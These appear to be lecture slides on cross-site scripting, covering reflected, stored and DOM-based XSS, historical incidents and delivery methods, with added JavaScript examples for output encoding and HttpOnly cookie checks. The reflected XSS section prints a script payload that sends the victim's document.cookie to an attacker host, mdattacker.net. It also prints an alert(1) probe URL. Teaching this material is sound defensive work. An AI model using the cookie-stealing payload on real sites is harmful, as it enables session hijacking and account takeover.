presented by: chandra kollipara. cross-site scripting: cross-site scripting attacks are a type of...
Chapter 12: Attacking Users: Cross-Site Scripting
Presented By: Chandra Kollipara
Cross-Site Scripting:
Cross-site scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.
“Users get compromised because they are not security-conscious”
“You can’t own a web application via XSS.”
Types of XSS:
Reflected
Stored
DOM-based
Reflected XSS:
http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred
http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>
Exploiting the vulnerability
http://mdsec.net/error/5/Error.ashx?message=<script>var+i=new+Image;+i.src="http://mdattacker.net/"%2bdocument.cookie;</script>
var i=new Image; i.src="http://mdattacker.net/"+document.cookie;
Q. Why doesn’t the attacker simply host a malicious script on mdattacker.net and feed the user a direct link to this script?
Stored XSS Vulnerability:
Data submitted by one user is stored in the application (typically in a back-end database) and then is displayed to other users without being filtered or sanitized appropriately.
It involves two requests:
The attacker posts some crafted data containing malicious code that the application stores.
A victim views a page containing the attacker’s data, and the malicious code is executed in the victim’s browser.
DOM-based XSS Vulnerability:
DOM-based XSS vulnerabilities are more similar to reflected XSS bugs than to stored XSS bugs.
Their exploitation typically involves an attacker’s inducing a user to access a crafted URL containing malicious code.
The server’s response to that specific request causes the malicious code to be executed.
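Added example, not from the slides: the error page from the reflected XSS slides modelled as a function that copies the `message` parameter into HTML, next to a version that encodes it first. The same encoding step applies when client-side script reads the URL (the DOM-based case); the function names and the `<p class="error">` markup are assumptions.

```javascript
// Added example (not from the slides). Models a page that copies the
// `message` query parameter into its HTML, as Error.ashx does in the slides.

// Encode the characters that can change HTML parsing context.
function encodeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read `message` the way server code (reflected) or page script (DOM-based) would.
function getMessage(url) {
  return new URL(url).searchParams.get('message') ?? '';
}

// Vulnerable: the raw value is placed into markup, so tags in it become live.
function renderErrorUnsafe(url) {
  return `<p class="error">${getMessage(url)}</p>`;
}

// Hardened: the value is encoded for the HTML element-content context.
function renderErrorSafe(url) {
  return `<p class="error">${encodeHtml(getMessage(url))}</p>`;
}

// Count <script> start tags a browser would find in the output.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// The two URLs shown on the slides.
const benign = 'http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred';
const probe = 'http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>';

console.log(renderErrorSafe(benign));
console.log(scriptTagCount(renderErrorUnsafe(probe)), scriptTagCount(renderErrorSafe(probe)));
```

The encoder covers element content and quoted attribute values only; values placed inside script blocks, URLs or event handlers need encoding specific to those contexts.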
XSS Attacks in Action:
In 2010, the Apache Foundation was compromised via a reflected XSS attack within its issue-tracking application.
http://blogs.apache.org/infra/entry/apache_org_04_09_2010
In 2005, the social networking site MySpace was found to be vulnerable to a stored XSS attack.
http://namb.la/popular/tech.html
In 2009, Twitter fell victim to two XSS worms.
www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html
http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-andsomething.html
Payload for XSS Attacks:
It involves capturing a victim’s session token, hijacking her session, and thereby making use of the application “as” the victim, performing arbitrary actions and potentially taking ownership of that user’s account.
Virtual Defacement
Injecting Trojan Functionality
Inducing user actions
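Added example, not from the slides: the session-token payload above and the earlier `document.cookie` script both depend on the token being readable by script, so this check computes what script can read from a set of `Set-Cookie` headers. The header values, function names and session-name pattern are constructed assumptions, and every cookie is assumed to be in scope for the page.

```javascript
// Added example (not from the slides). Header values are constructed samples.

// Parse one Set-Cookie header value into name, value and lower-cased attribute names.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((part) => part.trim());
  const eq = pair.indexOf('=');
  const attributes = new Set(
    attrs.filter(Boolean).map((a) => a.split('=')[0].trim().toLowerCase())
  );
  // A pair without '=' is treated as a nameless cookie.
  const name = eq === -1 ? '' : pair.slice(0, eq);
  const value = eq === -1 ? pair : pair.slice(eq + 1);
  return { name, value, attributes };
}

// What document.cookie would expose: every cookie set without HttpOnly.
// Assumes all cookies are unexpired and in scope (path/domain) for the page.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attributes.has('httponly'))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Names that look like session tokens but lack HttpOnly.
// The name pattern is a heuristic assumption for this example.
function exposedSessionCookies(setCookieHeaders, pattern = /sess|sid|token|auth/i) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => pattern.test(c.name) && !c.attributes.has('httponly'))
    .map((c) => c.name);
}

const weak = ['SessionId=CONSTRUCTED123; Path=/', 'theme=dark; Path=/'];
const hardened = ['SessionId=CONSTRUCTED123; Path=/; Secure; HttpOnly', 'theme=dark; Path=/'];

console.log(scriptVisibleCookies(weak));      // session token readable by script
console.log(scriptVisibleCookies(hardened));  // only the non-sensitive cookie remains
console.log(exposedSessionCookies(weak));
```

HttpOnly only removes the token from `document.cookie`; injected script can still act within the victim's session, so the other payloads listed above are unaffected by it.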
Virtual Defacement
Injecting Trojan functionality
Delivery Mechanisms
In a targeted attack, a forged e-mail may be sent to a single target user or a small number of users.
A URL can be fed to a target user in an instant message.
Content and code on third-party websites can be used to generate requests that trigger XSS flaws.
Many web applications implement a function to “tell a friend” or send feedback to site administrators.
For Stored XSS:
The two kinds of delivery mechanisms for stored XSS attacks are in-band and out-of-band.
In-band delivery applies in most cases and is used when the data that is the subject of the vulnerability is supplied to the application via its main web interface.
Out-of-band delivery applies in cases where the data that is the subject of the vulnerability is supplied to the application through some other channel.
Thank You Questions?